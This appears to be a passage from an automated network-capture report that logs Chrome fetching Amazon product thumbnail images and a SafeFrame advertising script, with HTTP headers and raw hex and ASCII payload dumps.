                                                                                                                                                                                                        2024-08-15 13:38:06 UTC510INData Raw: fc 52 b4 c3 8e 85 00 77 29 3e 04 18 0f b6 9f b5 09 9b 6c 8e b0 ef 8f 48 6f b6 3b c4 2d e6 fb 43 be 12 fa 36 28 77 c7 a4 27 b6 3b e0 be 02 ba e0 fc 60 cc 82 07 3f c6 0c d6 f5 f8 c1 7c 11 d7 1f 34 67 1d b1 df 0a 74 f6 a3 8f 20 e8 bf 18 7d c2 a5 ea 6f a4 70 50 c9 7a ba d1 fe 9b 2f 13 dd 93 f5 7b 0e 12 9a 42 e8 53 ca 71 41 29 6c 36 b2 48 27 a8 a1 14 fc 0d 53 9a 6c bc f3 5e 8c 01 16 4b dc c5 aa fb 42 46 62 3e 36 89 ac 3a fc b1 d4 a4 fd d7 fa 41 a5 bd ba 05 31 ed b1 ea e7 b7 43 74 d7 52 4e 91 ea f7 77 42 9a 21 e4 b0 53 ce 52 14 a1 ba c9 21 27 c4 c7 ab 9c dd 06 9a ef 66 15 4b 72 fd 58 14 b7 36 a0 41 a5 2e fd 51 12 98 42 66 6e dc 5e 41 7d e4 8f d3 0e f0 5d 56 0c 2d d4 06 9c ca 09 08 4a c9 5a ad b0 02 90 2e 63 82 0a 62 9a 9f 9d 71 de 63 ad 31 95 6c 2d 0e 36 f2 38
                                                                                                                                                                                                        Data Ascii: Rw)>lHo;-C6(w';`?|4gt }opPz/{BSqA)l6H'Sl^KBFb>6:A1CtRNwB!SR!'fKrX6A.QBfn^A}]V-JZ.cbqc1l-68


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        101192.168.2.449882151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC700OUTGET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3517
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 5dea5025-7aea-485e-a9c4-bcde5065c8f2
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 05 Feb 2024 13:19:10 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 03 Mar 2044 20:00:27 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 174234
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:06 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100168-IAD, cache-ewr-kewr1740060-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 02 01 02 02 02 02 03 04 03 03 03 03 03 06 04 03 04 04 05 03 04 04 05 04 05 05 04 05 05 05 05 06 05 04 04 05 06 05 05 05 08 05 06 06 07 06 05 07 05 08 05 08 08 08 08 09 09 08 05 09 0c 01 02 02 01 02 02 02 03 02 02 04 07 05 03 06 08 06 03 05 09 08 09 06 08 08 08 08 06 0a 08 09 07 08 05 08 08 06 07 07 06 06 06 05 06 08 06 08 08 08 03 06 08 07 05 0b 06 06 05 08 07 09 07 05 08 0a ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 37 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 08 09 05 06 03 04 07 02 0a 01 01 01 00 01 05 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 48 0d e7 16 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIFt"7H
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 3b 5c d2 82 fc 46 a0 55 1c cb f0 cf 6b 7c 2b 7d d3 b1 c3 29 96 a9 3a 1d 6f a4 14 bf 08 50 5a c9 48 72 da e9 05 f1 14 8a 27 d6 8d 4f c9 fe db 22 11 7b 4b b7 c4 2c 54 7a 50 d8 50 46 55 2a 56 48 94 a9 1e a9 35 d9 74 c3 dd 8d 13 aa 62 92 5f 65 d5 22 22 f0 48 82 43 78 29 49 84 eb 6e 93 68 3e 72 15 25 18 5d bb 28 4c b9 b6 9c 2a 65 02 52 db 99 6e 6b 45 e4 6d 92 d2 c7 63 f4 fa 99 d9 53 de 5b 22 61 b5 95 98 56 e2 89 b5 ba 4a d0 6a 01 4f eb 1a b3 7a 13 27 18 ae d2 d1 27 75 60 ca 4d 5b 97 65 29 84 3e 73 34 bb 41 c2 1b 70 b0 f4 43 c2 ab d5 0f 9b df 09 d8 87 d1 8d a1 c1 6d f6 c3 d5 e1 92 ac 5c 5f 6b 38 9e 37 08 6a fd 1e 15 f9 ec ef b6 4d ca 4e 92 38 5d a3 5f df fd a2 65 02 ae 34 6b 47 e7 33 ce d1 32 8e 30 b4 6f d5 cf 3b 64 ca 09 5d 68 e1 f7 ff 00 68 9b 40 ab 3d 1a cd
                                                                                                                                                                                                        Data Ascii: ;\FUk|+}):oPZHr'O"{K,TzPPFU*VH5tb_e""HCx)Inh>r%](L*eRnkEmcS["aVJjOz''u`M[e)>s4ApCm\_k87jMN8]_e4kG320o;d]hh@=
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC761INData Raw: 32 61 e5 a6 10 da 18 e0 b2 14 c6 d5 c7 07 50 ec a3 82 e8 76 71 c1 74 3b 38 e0 ea 1d 94 70 75 0e ca 38 3a 87 65 1c 1d 43 b2 8e 0e a1 d9 47 07 50 ec a3 83 88 b6 71 c1 c4 5b 38 14 99 30 75 70 cc 52 56 73 20 b3 d7 77 92 5e 99 0b 8d 3b 76 1b 59 7f ad 7f ff c4 00 2f 11 00 00 04 02 07 08 02 02 03 00 00 00 00 00 00 00 00 03 04 05 02 06 01 11 12 13 16 53 a2 14 15 17 20 23 32 62 63 30 42 21 33 35 52 72 ff da 00 08 01 02 01 01 3f 00 f9 95 1f 49 44 98 6d 00 89 ae 61 32 12 4a a2 c7 64 0a 3e df 61 be 66 6f 46 b1 be 66 6f 46 b1 be 26 6f 46 b1 be a6 6f 46 a0 d3 31 3a a8 5a 46 d9 62 ee 3b 7a 39 95 d1 5a 63 02 36 35 05 c4 49 be 98 09 1b 09 83 66 30 6c c6 0a 50 19 4d 01 b9 0c 69 d6 a2 20 ce fb 07 72 a9 5c 5a 62 e3 50 67 eb ef 1c 45 6a 30 be 99 83 1b 37 66 0c 68 d7 99 00 c7
                                                                                                                                                                                                        Data Ascii: 2aPvqt;8pu8:eCGPq[80upRVs w^;vY/S #2bc0B!35Rr?IDma2Jd>afoFfoF&oFoF1:ZFb;z9Zc65If0lPMi r\ZbPgEj07fh


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        102192.168.2.449883151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC700OUTGET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2504
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: e48b20aa-bc25-42d9-9768-3f4e57f3166a
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 05 Feb 2024 13:19:10 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 03 Mar 2044 20:00:27 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 200233
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:06 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000056-IAD, cache-ewr-kewr1740046-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 02 01 02 02 02 02 03 04 03 03 03 03 03 06 04 03 04 04 05 03 04 04 05 04 05 05 04 05 05 05 05 06 05 04 04 05 06 05 05 05 08 05 06 06 07 06 05 07 05 08 05 08 08 08 08 09 09 08 05 09 0c 01 02 02 01 02 02 02 03 02 02 04 07 05 03 06 08 06 03 05 09 08 09 06 08 08 08 08 06 0a 08 09 07 08 05 08 08 06 07 07 06 06 06 05 06 08 06 08 08 08 03 06 08 07 05 0b 06 06 05 08 07 09 07 05 08 0a ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 37 00 01 00 02 02 02 02 03 00 00 00 00 00 00 00 00 00 00 09 0a 07 08 06 0b 03 04 01 02 05 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 01 04 03 05 06 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b4 80 de 71 60 00 00 06 3d af 45
                                                                                                                                                                                                        Data Ascii: JFIFt"7q`=E
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1126INData Raw: b5 dd 6d c4 8a ef 0e 9c 98 88 ef 06 e7 61 3e 21 08 45 26 21 74 30 5c df 39 5c a7 e5 15 ee ce 57 34 ae 22 52 5c b4 3b fd 36 44 b7 57 a6 3e a7 68 f0 5d d5 00 4c 65 e2 2a 81 76 10 7f f1 e1 bf da e5 fc b6 b1 59 ee e7 2d 3a 3b a0 9c 11 7e 31 7f b3 8d 12 66 1e 69 69 48 95 d1 68 59 0e e3 13 8a a2 39 69 75 ad 71 83 58 65 29 06 25 c9 e9 5c 28 ad 14 83 c7 d3 d3 2b 39 53 66 1e a5 25 aa 46 1e 66 4d b1 65 f3 04 65 d2 5c 61 81 38 b3 cc 2e cf f9 0b 5b 2f 92 11 6c 94 58 cd bd c8 95 5d 59 94 55 ec 6d 5b 55 d3 ca cb 8e b3 ab a7 63 aa 02 28 c8 97 51 69 71 0b bc 11 6d 8e 5d a5 cb 6a e9 79 46 b5 8c 99 dc 19 ab 6e 1c 33 50 70 89 a4 16 44 a9 07 da cc b2 3d 9b 0d 0c 9c c1 ff 00 df 6b 1a a1 d0 0e a7 b4 3e 95 1c f5 6c c2 6b 7e 23 99 5e 3e 38 ab 3e 27 d8 bd b7 83 ee 39 d7 17 4b b0
                                                                                                                                                                                                        Data Ascii: ma>!E&!t0\9\W4"R\;6DW>h]Le*vY-:;~1fiiHhY9iuqXe)%\(+9Sf%FfMee\a8.[/lX]YUm[Uc(Qiqm]jyFn3PpD=k>lk~#^>8>'9K


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        103192.168.2.449890151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC700OUTGET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610035_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2473
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 8bc2118c-df56-4896-8681-8a1ed89012ae
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 05 Feb 2024 13:19:10 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sun, 31 Jan 2044 13:29:41 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1387302
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:06 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000089-IAD, cache-nyc-kteb1890026-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 02 01 02 02 02 02 03 04 03 03 03 03 03 06 04 03 04 04 05 03 04 04 05 04 05 05 04 05 05 05 05 06 05 04 04 05 06 05 05 05 08 05 06 06 07 06 05 07 05 08 05 08 08 08 08 09 09 08 05 09 0c 01 02 02 01 02 02 02 03 02 02 04 07 05 03 06 08 06 03 05 09 08 09 06 08 08 08 08 06 0a 08 09 07 08 05 08 08 06 07 07 06 06 06 05 06 08 06 08 08 08 03 06 08 07 05 0b 06 06 05 08 07 09 07 05 08 0a ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 37 00 01 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 08 04 05 06 07 09 03 0a 01 02 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 06 07 01 03 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 90 17 98 b0 00 00 00 f3 d2 d5
                                                                                                                                                                                                        Data Ascii: JFIFt"7
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1095INData Raw: 33 6a 26 3f e9 84 dc 5b bf 87 a4 b1 2f c9 d9 85 38 91 70 a2 8b f3 43 9e 6c 41 37 1f f8 f9 ac 7e 5a c6 ef 25 5c dd 06 d8 b2 d4 dc a3 59 31 0c ba 4e 47 b8 b8 fb ad 4b f2 95 5b 87 33 f8 78 5b 53 71 ee 58 f5 07 97 e2 69 2f 26 9b 5f f1 44 ae 7f 91 be fa ad 86 b1 cd f4 90 4b 1a 41 55 02 a6 98 8e ee f3 d9 db 39 70 e3 97 6c 8e 6e 88 56 fd d8 a9 fe d8 74 4e 03 96 5a 36 92 1c c5 41 27 20 5b 8e 5f 3e 78 e6 d9 0b f1 2e da e9 b6 6c d4 4b 60 03 11 ee 15 40 39 2f ea 1c cb 93 c4 7c e4 9d d4 c8 6f 31 7b ee a5 4e 89 9a 25 bd e9 a2 96 c9 2d f5 51 72 77 95 44 bf dc ed 8b 98 9a 30 56 91 58 5e 58 b4 e8 ac d8 91 b7 30 a2 55 4e 75 c1 28 b8 61 61 bc db 99 2a 7c 62 62 e4 8d 9c 8c 85 6c 3b 59 44 cc 53 d1 65 9e 97 df 9f 10 ae 4b cd 21 2e 93 2d 4a 53 9d a4 8e 7d aa d8 75 87 9b 30 96
                                                                                                                                                                                                        Data Ascii: 3j&?[/8pClA7~Z%\Y1NGK[3x[SqXi/&_DKAU9plnVtNZ6A' [_>x.lK`@9/|o1{N%-QrwD0VX^X0UNu(aa*|bbl;YDSeK!.-JS}u0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        104192.168.2.449895151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC618OUTGET /images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1374INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 42614
                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                        X-Amz-IR-Id: 2a524287-55bd-4138-93c2-ca41d7d24eaf
                                                                                                                                                                                                        Cache-Control: max-age=15552000,public
                                                                                                                                                                                                        Last-Modified: Thu, 08 Aug 2024 18:29:52 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                        Expires: Tue, 04 Feb 2025 18:30:43 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 586240
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:06 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100070-IAD, cache-nyc-kteb1890046-NYC
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 65 3d 3e 65 2b 22 5f 46 65 65 64 62 61 63 6b 22 3b 63 6c 61 73 73 20 74 7b 61 73 79 6e 63 20 61 64 64 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 57 69 74 68 46 65 65 64 62 61 63 6b 4c 69 6e 6b 28 65 2c 74 29 7b 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 54 6f 28 74 68 69 73 2e 70 61 72 65 6e 74 48 74 6d 6c 49 64 2c 74 68 69 73 29 3b 63 6f 6e 73 74 20 61 3d 61 77 61 69 74 20 74 2e 67 65 74 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 41 6e 64 46 65 65 64 62 61 63 6b 4c 69 6e 6b 28 74 68 69 73 2e 75 72 6c 50 61 74 68 41 6e 64 50 61 72 61 6d 65 74 65 72 29 3b 69 66 28 21 28 6e 75 6c 6c 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 69 73 4f 6b 28 29 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 60 52 65 73 75 6c 74 20 66 72
                                                                                                                                                                                                        Data Ascii: (()=>{const e=e=>e+"_Feedback";class t{async addSponsoredLabelWithFeedbackLink(e,t){e.appendChildTo(this.parentHtmlId,this);const a=await t.getSponsoredLabelAndFeedbackLink(this.urlPathAndParameter);if(!(null==a?void 0:a.isOk()))throw new Error(`Result fr
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 28 65 29 7b 65 2e 6c 61 62 65 6c 52 65 6e 64 65 72 65 64 43 72 65 61 74 69 76 65 28 29 7d 72 65 6d 6f 76 65 53 70 6f 6e 73 6f 72 65 64 4c 61 62 65 6c 41 6e 64 46 65 65 64 62 61 63 6b 4c 69 6e 6b 28 74 29 7b 74 72 79 7b 76 61 72 20 61 3b 6e 75 6c 6c 3d 3d 3d 28 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 28 74 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 7c 7c 61 2e 72 65 6d 6f 76 65 28 29 7d 63 61 74 63 68 28 6e 29 7b 69 28 22 55 6e 61 62 6c 65 20 74 6f 20 72 65 6d 6f 76 65 20 41 64 46 65 65 64 62 61 63 6b 20 44 69 76 22 2c 6e 29 7d 7d 6c 6f 67 54 72 61 6e 73 70 61 72 65 6e 63 79 49 6e 66 6f 4d 69 73 73 69 6e 67 28 65 29 7b 65 2e 74 72 61 6e 73 70 61 72 65 6e 63 79 49 6e 66 6f 4d 69 73 73 69 6e 67 28 29 7d 63 6f 6e 73
                                                                                                                                                                                                        Data Ascii: (e){e.labelRenderedCreative()}removeSponsoredLabelAndFeedbackLink(t){try{var a;null===(a=document.getElementById(e(t)))||void 0===a||a.remove()}catch(n){i("Unable to remove AdFeedback Div",n)}}logTransparencyInfoMissing(e){e.transparencyInfoMissing()}cons
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 63 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 2c 65 2e 63 6f 75 6e 74 29 7d 29 29 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 74 26 26 67 28 22 22 2e 63 6f 6e 63 61 74 28 62 28 65 29 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 74 29 2c 61 29 7d 3b 6c 28 65 2c 74 2e 69 64 2c 61 29 2c 6c 28 65 2c 75 28 74 2e 69 64 29 2c 61 29 2c 6c 28 65 2c 70 28 74 2e 6e 61 6d 65 29 2c 61 29 2c 6c 28 65 2c 6d 28 70 28 74 2e 6e 61 6d 65 29 29 2c 61 29 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 6e 2c 69 2c 72 2c 73 2c 6f 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 21 77 28 29 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 73 61 66 65 66 72 61 6d 65 3d 6e 75 6c 6c 21 3d 3d 28 61 3d 77 69 6e 64 6f 77 2e 73 61 66 65
                                                                                                                                                                                                        Data Ascii: c,e.placement,e.count)}));var l=function(e,t,a){t&&g("".concat(b(e),":").concat(t),a)};l(e,t.id,a),l(e,u(t.id),a),l(e,p(t.name),a),l(e,m(p(t.name)),a)},v=function(e,t){var a,n,i,r,s,o;if(void 0===t&&(t=1),!w())return window.safeframe=null!==(a=window.safe
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 65 66 72 61 6d 65 2e 63 73 61 45 76 65 6e 74 2e 31 22 2c 6d 65 74 72 69 63 4e 61 6d 65 3a 65 2b 22 3a 22 2b 74 2e 6e 61 6d 65 2b 22 3a 22 2b 74 2e 69 64 2c 6d 65 74 72 69 63 56 61 6c 75 65 3a 61 7d 2c 7b 65 6e 74 3a 22 61 6c 6c 22 7d 29 7d 63 61 74 63 68 28 6e 29 7b 69 28 22 45 72 72 6f 72 20 77 69 74 68 20 27 6c 6f 67 43 73 61 45 76 65 6e 74 27 20 43 53 41 22 2c 6e 29 7d 7d 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 31 29 2c 77 69 6e 64 6f 77 2e 63 73 61 29 74 72 79 7b 77 69 6e 64 6f 77 2e 63 73 61 28 22 45 76 65 6e 74 73 22 2c 7b 70 72 6f 64 75 63 65 72 49 64 3a 22 61 64 70 6c 61 63 65 6d 65 6e 74 73 22 7d 29 28 22 6c 6f 67 22 2c 7b 73 63 68 65 6d 61 49 64 3a 22 41 70 65 53 61 66 65 66 72 61
